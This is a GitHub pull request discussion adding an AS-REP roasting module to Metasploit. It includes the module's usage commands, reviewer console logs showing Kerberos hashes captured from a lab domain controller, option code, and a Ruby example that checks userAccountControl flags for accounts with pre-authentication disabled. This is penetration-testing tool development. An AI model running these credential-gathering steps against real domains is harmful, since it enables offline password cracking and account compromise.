
Add a specific module to perform ASREP-roasts #18569

Merged
merged 7 commits into from
Dec 12, 2023

Conversation

smashery
Contributor

@smashery smashery commented Nov 23, 2023

This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two different mechanisms:

  • Brute force using a file full of usernames
  • LDAP query to request the relevant usernames, followed by requesting TGTs

Both of these features existed within Metasploit (kerberos_login and ldap_query), but they weren't easily discoverable.

I've forced the LDAP auth default to NTLM, since domain controllers don't accept the default plaintext auth method.

Verification

  • Start msfconsole
  • use asrep
  • Create a file with a username of a user that is ASREP-roastable
  • run action=BRUTE_FORCE user_file=<file> rhost=<rhost> domain=<domain> rhostname=<hostname>
  • Verify that this finds the user, and displays a value that can be cracked by Hashcat
  • run action=LDAP rhost=<host> username=<ldap username> password=<ldap password> ldap::auth=kerberos domain=<domain> domaincontrollerrhost=<domain ip> rhostname=<hostname>
  • Verify that this finds all pre-auth-less users, and displays a value that can be cracked by Hashcat
  • Set USE_RC4_HMAC to false
  • Verify that it requests a ticket with the default etypes, and displays a $18$ hash
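An added example, not part of this PR or of the framework's code, showing the audit the LDAP action rests on: which accounts carry the DONT_REQ_PREAUTH bit in userAccountControl, and which of those are disabled and so would fail at the KDC rather than return an AS-REP. The entries and names are constructed sample data.

```ruby
# Added example (not part of the PR or Metasploit's code): audit constructed
# LDAP-style user entries for the DONT_REQ_PREAUTH flag, i.e. the accounts the
# module's LDAP action would target. Flag values follow the documented
# userAccountControl bit layout; the entries below are constructed sample data.

UAC_ACCOUNTDISABLE   = 0x0002
UAC_DONT_REQ_PREAUTH = 0x400000

# Constructed sample entries in the shape an LDAP search would return.
SAMPLE_ENTRIES = [
  { 'sAMAccountName' => 'Administrator', 'userAccountControl' => 512 },            # normal, pre-auth required
  { 'sAMAccountName' => 'msfuser',       'userAccountControl' => 512 + 0x400000 }, # pre-auth disabled
  { 'sAMAccountName' => 'svc_old',       'userAccountControl' => 514 + 0x400000 }, # pre-auth disabled, account disabled
].freeze

# LDAP filter using the bitwise-AND matching rule (LDAP_MATCHING_RULE_BIT_AND);
# a directory client passes this to return only pre-auth-less user objects.
def preauth_disabled_filter
  "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=#{UAC_DONT_REQ_PREAUTH}))"
end

# Returns the sAMAccountNames of accounts that do not require pre-authentication,
# split into enabled ones and disabled ones. Disabled accounts are reported
# separately because the KDC rejects them (typically KDC_ERR_CLIENT_REVOKED)
# instead of answering with an AS-REP, which shows up as the per-user
# "received error when attempting to retrieve TGT" case in the thread above.
def roastable_accounts(entries)
  result = { roastable: [], disabled: [] }
  entries.each do |e|
    uac = e['userAccountControl'].to_i
    next if (uac & UAC_DONT_REQ_PREAUTH).zero?
    if (uac & UAC_ACCOUNTDISABLE).zero?
      result[:roastable] << e['sAMAccountName']
    else
      result[:disabled] << e['sAMAccountName']
    end
  end
  result
end

if __FILE__ == $PROGRAM_NAME
  r = roastable_accounts(SAMPLE_ENTRIES)
  puts "Filter: #{preauth_disabled_filter}"
  puts "Pre-auth disabled, enabled accounts:  #{r[:roastable].join(', ')}"
  puts "Pre-auth disabled, disabled accounts: #{r[:disabled].join(', ')}"
end
```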

@smashery smashery marked this pull request as ready for review November 23, 2023 23:11
@jheysel-r7 jheysel-r7 self-assigned this Nov 29, 2023
Contributor

@jheysel-r7 jheysel-r7 left a comment


Thanks for the PR @smashery! Looking good so far, just a couple minor comments.

I was running into some issues actually getting hashes back from the target despite users being reported as ASREP-roastable. Was wondering if you might have any thoughts / suggestions?

msf6 auxiliary(gather/asrep) > run action=LDAP rhost=172.16.199.200 username=Administrator password=N0tpassword! domain=kerberos.issue rhostname=dc2.kerberos.issue
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue

[-] Administrator reported as ASREP-roastable, but received error when attempting to retrieve TGT
[-] msfuser reported as ASREP-roastable, but received error when attempting to retrieve TGT

[*] Query returned 2 results.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=172.16.199.200 domain=kerberos.issue rhostname=dc2.kerberos.issue domaincontrollerrhost=172.16.199.200
[*] Running module against 172.16.199.200

[-] No users found without preauth required
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > cat /tmp/users.txt
[*] exec: cat /tmp/users.txt

Administrator
msfuser

@smashery
Contributor Author

Thanks @jheysel-r7 - I've incorporated all your suggested changes.

I'm curious about the failure to retrieve the user accounts. It could be any number of Kerberos errors that would be entirely expected: disabled account, clock skew between your MSF host and the DC, disabled encryption types; but it could also potentially be a bug. I've added logging of the error description to help users diagnose the root cause of each failure. Are you able to pull the latest changes (I added logging of the error description) and let me know what the error is please? (And maybe also Windows version).

)
register_advanced_options(
  [
    OptEnum.new('LDAP::Auth', [true, 'The Authentication mechanism to use', Msf::Exploit::Remote::AuthOption::NTLM, Msf::Exploit::Remote::AuthOption::LDAP_OPTIONS]),
  ]
)
Contributor

Does this have to be registered because there's a problem when it's left at its default value of auto?

Contributor Author

Yeah, if it's auto, it just uses plaintext, which isn't supported on domain controllers, so it just fails. Given this won't be run on non-DC LDAP servers, I think that's a reasonable default.

Contributor

@jheysel-r7 jheysel-r7 left a comment


Thanks for the speedy reply @smashery! My apologies - I was setting the Rhostname datastore option to the hostname + the domain name: dc2.kerberos.issue which was causing the following error to be thrown:
Kerberos Error - KDC_ERR_S_PRINCIPAL_UNKNOWN (7) - Server not found in Kerberos database

My confusion was stemming from when using the psexec module with kerberos authentication, you can set SMB::Rhostname to dc2.kerberos.issue or dc2 and the module runs successfully.

I was able to get this module running successfully by setting Rhostname to either a valid SPN like ldap/dc2.kerberos.issue or just the hostname dc2.

Anyways sorry for the confusion. The module is running fine when the action is set to LDAP but when set to BRUTE_FORCE I'm getting a NoMethodError for pluralize. Did you maybe forget to push a commit? I also didn't see the error logging you had mentioned you added.

msf6 auxiliary(gather/asrep) > run
[*] Running module against 172.16.199.200

[+] Successfully bound to the LDAP server!
[*] 172.16.199.200:389 Getting root DSE
[+] 172.16.199.200:389 Discovered base DN: DC=kerberos,DC=issue
[+] 172.16.199.200:389 Discovered schema DN: DC=kerberos,DC=issue

[email protected]:984cb08c7b3c15bf30fc7efeeb100661$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
[email protected]:f5d4cf6a878e94cd3245be3f832da774$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

[*] Query returned 2 results.
[*] Auxiliary module execution completed
msf6 auxiliary(gather/asrep) > set action BRUTE_FORCE
action => BRUTE_FORCE
msf6 auxiliary(gather/asrep) > run
[*] Running module against 172.16.199.200

[email protected]:d4f4898a93d7e042e0603181f861ebab$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
[email protected]:8484e0f20b4c0e49a7561b7b94b015e2$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

[-] Auxiliary failed: NoMethodError undefined method `pluralize' for #<Module:auxiliary/gather/asrep <redacted>
[-] Call stack:
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/auxiliary/gather/asrep.rb:90:in `run_brute'
[-]   /Users/jheysel/rapid7/metasploit-framework/modules/auxiliary/gather/asrep.rb:65:in `run'
[*] Auxiliary module execution completed

@smashery
Contributor Author

Thanks - yeah, I mistakenly added buggy pluralize to the BRUTE_FORCE code path, but tested in the LDAP one, so hadn't noticed this was never a valid change. Fixed now, and tested properly.

@jheysel-r7
Contributor

Thanks @smashery! Spencer just had two minor comments about datastore options, but once those are resolved I think this is ready to land 🚀

@jheysel-r7 jheysel-r7 merged commit 603e5b2 into rapid7:master Dec 12, 2023
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 12, 2023
@jheysel-r7
Contributor

Release Notes

This adds a module to gather credential material from accounts with "Requires Pre-Authentication" disabled. The module supports two mechanisms: brute forcing using a list of usernames, or using an LDAP query to request the relevant usernames, followed by requesting TGTs.
